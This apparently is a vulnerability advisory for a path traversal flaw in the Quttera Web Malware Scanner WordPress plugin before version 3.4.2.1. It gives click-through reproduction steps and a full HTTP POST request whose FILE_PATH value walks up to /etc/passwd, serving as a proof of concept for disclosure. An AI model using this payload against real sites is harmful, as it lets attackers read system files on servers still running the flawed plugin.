Quttera Web Malware Scanner < 3.4.2.1 - Admin+ Path Traversal

2023-11-2100:00:00

Dmitrii Ignatyev

quttera web malware

scanner

admin panel

path traversal

exploit

file

security measures

9.5 High

AI Score

Confidence

High

0.001 Low

EPSS

Percentile

33.5%

JSON

Description IThe plugin does not validate user input used in a path, which could allow users with an admin role to perform path traversal attacks

1) Go to http://your_site/wordpress/wp-admin/admin.php?page=quttera_wm_scanner_int
2) Click "Scan Now"
3) Click "Detected Threats"
4) Navigate to some Suspicious file and click "Show File"
5) Change FILE_PATH to ../../../../../../../../etc/passwd

POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1
Host: your_site
User-Agent: Mozilla/5.0 (X11; Linux aarch64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://your_site/wordpress/wp-admin/admin.php?page=quttera_wm_scanner_int
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 83
Origin: http://your_site
Connection: close
Cookie: wordpress_5bd7a9c61cda6e66fc921a05bc80ee93=forgen%7C1699587855%7CrswNcdL929eZrRPTUd60ql5Vks17rzsIQiUjXec1dLx%7C8956fb23f485c0c0c418affb72358dbe444bd623bb174212c56eb8ac2b48b0aa; wp-settings-1=libraryContent%3Dbrowse%26siteorigin_panels_setting_tab%3Dwelcome%26hidetb%3D1%26mfold%3Do%26editor%3Dtinymce%26align%3Dleft%26urlbutton%3Dfile; wp-settings-time-1=1699383612; wordpress_test_cookie=WP%20Cookie%20check; wordpress_logged_in_5bd7a9c61cda6e66fc921a05bc80ee93=forgen%7C1699587855%7CrswNcdL929eZrRPTUd60ql5Vks17rzsIQiUjXec1dLx%7C91aaea805c33ffcb23969eed608e2bc3cbdf6dceb9c198755a280c02dfa88c1a
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

action=scanner-show_file&FILE_PATH=../../../../../../etc/passwd&_wpnonce=6603ebee0c